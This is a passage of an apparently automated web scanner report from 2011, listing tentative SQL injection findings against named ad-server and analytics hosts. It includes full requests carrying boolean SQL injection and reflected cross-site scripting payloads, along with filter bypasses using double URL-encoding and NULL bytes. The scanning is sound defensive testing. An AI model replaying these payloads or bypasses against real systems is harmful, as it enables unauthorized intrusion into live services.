GET /adam/detected?cat=hfmus.eg.hp.landingpage&page=039873858492717074&serial=1000:1:A&&LOC=http://ellegirl.elle.com/\qb1903\p3C/script\p3E\p3Cscript\p3Ealert(document.location)\p3C/script\p3E43727dda065=1&WIDTH=1106&HEIGHT=789&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=16&RES=RS21'%20and%201%3d2--%20&ORD=7748968311440455&req=fr&&&~=&OS=WIN7&JE=1&UL=en&RES=RS21 HTTP/1.1
Host: hfm.checkm8.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
Cookie: cm8dccp=1316277291

Response 2

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:51:24 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.11 NY-AD1
Set-cookie: C=o3L6Y9wUS38Scaa8dSI0P3Xb;Path=/;Expires=Fri, 01-Feb-2075 20:24:43 GMT;
x-internal-browser: MZ17
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.hfm.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-note: NO-COOKIES-BY-DISPATCHER-PARAMETER
x-internal-id: 140303008/1214455850/2850622218/2591229859
x-internal-selected:
x-internal-no-count: ROBOT-OVERLOAD
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

1.13. http://hfm.checkm8.com/adam/detected [Referer HTTP header] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://hfm.checkm8.com
Path:	/adam/detected

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payloads 30093398'%20or%201%3d1--%20 and 30093398'%20or%201%3d2--%20 were each submitted in the Referer HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adam/detected?cat=hfmus.eg.hp.landingpage&page=004009887110441923&serial=1000:1:A&&LOC=http://ellegirl.elle.com/&WIDTH=1087&HEIGHT=870&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=16&RES=RS21&ORD=22904634731821716&req=fr&&&~=&OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21 HTTP/1.1
Host: hfm.checkm8.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=30093398'%20or%201%3d1--%20
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cm8dccp=1316276692

Response 1

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:33:04 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.11 NY-AD1
Set-cookie: A=dqR5Y9wKWJSLv9UJ7MTba;Path=/;
Set-cookie: C=okZ5Y9wz8F6ScaaziSI0P3Xb;Path=/;Expires=Fri, 01-Feb-2075 20:06:24 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.hfm.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-note: NO-COOKIES-BY-DISPATCHER-PARAMETER
x-internal-id: 140138687/1214289938/2850622218/2591229859
x-internal-selected:
x-internal-no-count: ROBOT-OVERLOAD
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

Request 2

GET /adam/detected?cat=hfmus.eg.hp.landingpage&page=004009887110441923&serial=1000:1:A&&LOC=http://ellegirl.elle.com/&WIDTH=1087&HEIGHT=870&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=16&RES=RS21&ORD=22904634731821716&req=fr&&&~=&OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21 HTTP/1.1
Host: hfm.checkm8.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=30093398'%20or%201%3d2--%20
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cm8dccp=1316276692

Response 2

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:33:04 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.11 NY-AD1
Set-cookie: C=okZ5Y9wz8F6ScaaAiSI0P3Xb;Path=/;Expires=Fri, 01-Feb-2075 20:06:24 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.hfm.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-note: NO-COOKIES-BY-DISPATCHER-PARAMETER
x-internal-id: 140138687/1214289938/2850622218/2591229859
x-internal-selected:
x-internal-no-count: ROBOT-OVERLOAD
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

1.14. http://hfm.checkm8.com/adam/detected [WIDTH parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://hfm.checkm8.com
Path:	/adam/detected

Issue detail

The WIDTH parameter appears to be vulnerable to SQL injection attacks. The payloads 44066463'%20or%201%3d1--%20 and 44066463'%20or%201%3d2--%20 were each submitted in the WIDTH parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adam/detected?cat=hfmus.eg.hp.landingpage&page=039873858492717074&serial=1000:1:A&&LOC=http://ellegirl.elle.com/\qb1903\p3C/script\p3E\p3Cscript\p3Ealert(document.location)\p3C/script\p3E43727dda065=1&WIDTH=110644066463'%20or%201%3d1--%20&HEIGHT=789&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=16&RES=RS21&ORD=7748968311440455&req=fr&&&~=&OS=WIN7&JE=1&UL=en&RES=RS21 HTTP/1.1
Host: hfm.checkm8.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
Cookie: cm8dccp=1316277291

Response 1

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:51:12 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.12 NY-AD2
Set-cookie: A=dqR5Y9wb858Sv9UJ7MTba;Path=/;
Set-cookie: C=oSL6Y9wdWQQ0caa6cSI0P3Xb;Path=/;Expires=Fri, 01-Feb-2075 20:24:31 GMT;
x-internal-browser: MZ17
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.hfm.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-note: NO-COOKIES-BY-DISPATCHER-PARAMETER
x-internal-id: 153982087/1228215537/2850622218/2591229859
x-internal-selected:
x-internal-no-count: ROBOT-OVERLOAD
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

Request 2

GET /adam/detected?cat=hfmus.eg.hp.landingpage&page=039873858492717074&serial=1000:1:A&&LOC=http://ellegirl.elle.com/\qb1903\p3C/script\p3E\p3Cscript\p3Ealert(document.location)\p3C/script\p3E43727dda065=1&WIDTH=110644066463'%20or%201%3d2--%20&HEIGHT=789&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=16&RES=RS21&ORD=7748968311440455&req=fr&&&~=&OS=WIN7&JE=1&UL=en&RES=RS21 HTTP/1.1
Host: hfm.checkm8.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
Cookie: cm8dccp=1316277291

Response 2

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:51:12 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.12 NY-AD2
Set-cookie: C=oSL6Y9wdWQQ0caa7cSI0P3Xb;Path=/;Expires=Fri, 01-Feb-2075 20:24:31 GMT;
x-internal-browser: MZ17
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.hfm.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-note: NO-COOKIES-BY-DISPATCHER-PARAMETER
x-internal-id: 153982087/1228215537/2850622218/2591229859
x-internal-selected:
x-internal-no-count: ROBOT-OVERLOAD
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

1.15. http://hfm.checkm8.com/adam/detected [cm8dccp cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://hfm.checkm8.com
Path:	/adam/detected

Issue detail

The cm8dccp cookie appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the cm8dccp cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adam/detected?cat=hfmus.eg.hp.landingpage&page=039873858492717074&serial=1000:1:A&&LOC=http://ellegirl.elle.com/\qb1903\p3C/script\p3E\p3Cscript\p3Ealert(document.location)\p3C/script\p3E43727dda065=1&WIDTH=1106&HEIGHT=789&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=16&RES=RS21&ORD=7748968311440455&req=fr&&&~=&OS=WIN7&JE=1&UL=en&RES=RS21 HTTP/1.1
Host: hfm.checkm8.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
Cookie: cm8dccp=1316277291%20and%201%3d1--%20

Response 1

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:51:42 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.12 NY-AD2
Set-cookie: A=dqR5Y9wb858Sv9UJ7MTba;Path=/;
Set-cookie: C=omM6Y9wdWQQ0caaCfSI0P3Xb;Path=/;Expires=Fri, 01-Feb-2075 20:25:01 GMT;
x-internal-browser: MZ17
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.hfm.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-note: NO-COOKIES-BY-DISPATCHER-PARAMETER
x-internal-id: 153982087/1228215537/2850622218/2591229859
x-internal-selected:
x-internal-no-count: ROBOT-OVERLOAD
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

Request 2

GET /adam/detected?cat=hfmus.eg.hp.landingpage&page=039873858492717074&serial=1000:1:A&&LOC=http://ellegirl.elle.com/\qb1903\p3C/script\p3E\p3Cscript\p3Ealert(document.location)\p3C/script\p3E43727dda065=1&WIDTH=1106&HEIGHT=789&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=16&RES=RS21&ORD=7748968311440455&req=fr&&&~=&OS=WIN7&JE=1&UL=en&RES=RS21 HTTP/1.1
Host: hfm.checkm8.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
Cookie: cm8dccp=1316277291%20and%201%3d2--%20

Response 2

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:51:43 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.12 NY-AD2
Set-cookie: C=omM6Y9wdWQQ0caaDfSI0P3Xb;Path=/;Expires=Fri, 01-Feb-2075 20:25:02 GMT;
x-internal-browser: MZ17
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.hfm.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-note: NO-COOKIES-BY-DISPATCHER-PARAMETER
x-internal-id: 153982087/1228215537/2850622218/2591229859
x-internal-selected:
x-internal-no-count: ROBOT-OVERLOAD
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

1.16. http://metrics.elle.com/b/ss/hcfellegirlprod/1/H.15.1/s92564277239143 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://metrics.elle.com
Path:	/b/ss/hcfellegirlprod/1/H.15.1/s92564277239143

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /b%2527/ss/hcfellegirlprod/1/H.15.1/s92564277239143?AQB=1&pccr=true&vidn=273A64F70516384F-40000181A003B62B&&ndh=1&t=17/8/2011%2016%3A26%3A30%206%20300&ns=hachettefilipacchi&pageName=eg%3Ahp%3Afront%3Apage%201&g=http%3A//ellegirl.elle.com/&r=http%3A//hearst.com/newspapers/metrix4media.php&cc=USD&events=event2&v2=eg%3Ahp%3Afront%3Apage%201&c3=Teen%20Fashion%20%u2013%20Hair%20and%20Makeup%20Tips%20for%20Teens%20%u2013%20ELLEgirl.com&v3=Teen%20Fashion%20%u2013%20Hair%20and%20Makeup%20Tips%20for%20Teens%20%u2013%20ELLEgirl.com&c6=eg%3Ahp&v6=eg%3Ahp&c7=eg%3Ahp&v7=eg%3Ahp&c8=http%3A//ellegirl.elle.com/&v8=http%3A//ellegirl.elle.com/&c11=5%3A00PM&v11=5%3A00PM&c12=Saturday&v12=Saturday&c13=Weekend&v13=Weekend&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1087&bh=870&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.elle.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; __qca=P0-629399934-1316294790891; s_vi=[CS]v1|273A64F70516384F-40000181A003B62B[CE]

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:49:15 GMT
Server: Omniture DC/2.0.0
Content-Length: 442
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b%27/ss/hcfellegirlprod/1/H.15.1/s92564277239143 was
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b%2527%2527/ss/hcfellegirlprod/1/H.15.1/s92564277239143?AQB=1&pccr=true&vidn=273A64F70516384F-40000181A003B62B&&ndh=1&t=17/8/2011%2016%3A26%3A30%206%20300&ns=hachettefilipacchi&pageName=eg%3Ahp%3Afront%3Apage%201&g=http%3A//ellegirl.elle.com/&r=http%3A//hearst.com/newspapers/metrix4media.php&cc=USD&events=event2&v2=eg%3Ahp%3Afront%3Apage%201&c3=Teen%20Fashion%20%u2013%20Hair%20and%20Makeup%20Tips%20for%20Teens%20%u2013%20ELLEgirl.com&v3=Teen%20Fashion%20%u2013%20Hair%20and%20Makeup%20Tips%20for%20Teens%20%u2013%20ELLEgirl.com&c6=eg%3Ahp&v6=eg%3Ahp&c7=eg%3Ahp&v7=eg%3Ahp&c8=http%3A//ellegirl.elle.com/&v8=http%3A//ellegirl.elle.com/&c11=5%3A00PM&v11=5%3A00PM&c12=Saturday&v12=Saturday&c13=Weekend&v13=Weekend&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1087&bh=870&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.elle.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; __qca=P0-629399934-1316294790891; s_vi=[CS]v1|273A64F70516384F-40000181A003B62B[CE]

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:49:15 GMT
Server: Omniture DC/2.0.0
xserver: www493
Content-Length: 0
Content-Type: text/html

1.17. http://metrics.elle.com/b/ss/hcfellegirlprod/1/H.15.1/s92564277239143 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://metrics.elle.com
Path:	/b/ss/hcfellegirlprod/1/H.15.1/s92564277239143

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

Request 1

GET /b/ss/hcfellegirlprod/1%00'/H.15.1/s92564277239143?AQB=1&pccr=true&vidn=273A64F70516384F-40000181A003B62B&&ndh=1&t=17/8/2011%2016%3A26%3A30%206%20300&ns=hachettefilipacchi&pageName=eg%3Ahp%3Afront%3Apage%201&g=http%3A//ellegirl.elle.com/&r=http%3A//hearst.com/newspapers/metrix4media.php&cc=USD&events=event2&v2=eg%3Ahp%3Afront%3Apage%201&c3=Teen%20Fashion%20%u2013%20Hair%20and%20Makeup%20Tips%20for%20Teens%20%u2013%20ELLEgirl.com&v3=Teen%20Fashion%20%u2013%20Hair%20and%20Makeup%20Tips%20for%20Teens%20%u2013%20ELLEgirl.com&c6=eg%3Ahp&v6=eg%3Ahp&c7=eg%3Ahp&v7=eg%3Ahp&c8=http%3A//ellegirl.elle.com/&v8=http%3A//ellegirl.elle.com/&c11=5%3A00PM&v11=5%3A00PM&c12=Saturday&v12=Saturday&c13=Weekend&v13=Weekend&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1087&bh=870&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.elle.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; __qca=P0-629399934-1316294790891; s_vi=[CS]v1|273A64F70516384F-40000181A003B62B[CE]

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:49:42 GMT
Server: Omniture DC/2.0.0
Content-Length: 416
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/hcfellegirlprod/1 was not found on this server.
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/hcfellegirlprod/1%00''/H.15.1/s92564277239143?AQB=1&pccr=true&vidn=273A64F70516384F-40000181A003B62B&&ndh=1&t=17/8/2011%2016%3A26%3A30%206%20300&ns=hachettefilipacchi&pageName=eg%3Ahp%3Afront%3Apage%201&g=http%3A//ellegirl.elle.com/&r=http%3A//hearst.com/newspapers/metrix4media.php&cc=USD&events=event2&v2=eg%3Ahp%3Afront%3Apage%201&c3=Teen%20Fashion%20%u2013%20Hair%20and%20Makeup%20Tips%20for%20Teens%20%u2013%20ELLEgirl.com&v3=Teen%20Fashion%20%u2013%20Hair%20and%20Makeup%20Tips%20for%20Teens%20%u2013%20ELLEgirl.com&c6=eg%3Ahp&v6=eg%3Ahp&c7=eg%3Ahp&v7=eg%3Ahp&c8=http%3A//ellegirl.elle.com/&v8=http%3A//ellegirl.elle.com/&c11=5%3A00PM&v11=5%3A00PM&c12=Saturday&v12=Saturday&c13=Weekend&v13=Weekend&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1087&bh=870&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.elle.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; __qca=P0-629399934-1316294790891; s_vi=[CS]v1|273A64F70516384F-40000181A003B62B[CE]

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:49:42 GMT
Server: Omniture DC/2.0.0
xserver: www409
Content-Length: 0
Content-Type: text/html

1.18. http://metrics.seattlepi.com/b/ss/hearstseattlepi/1/H.21/s92442379223648 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://metrics.seattlepi.com
Path:	/b/ss/hearstseattlepi/1/H.21/s92442379223648

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

Request 1

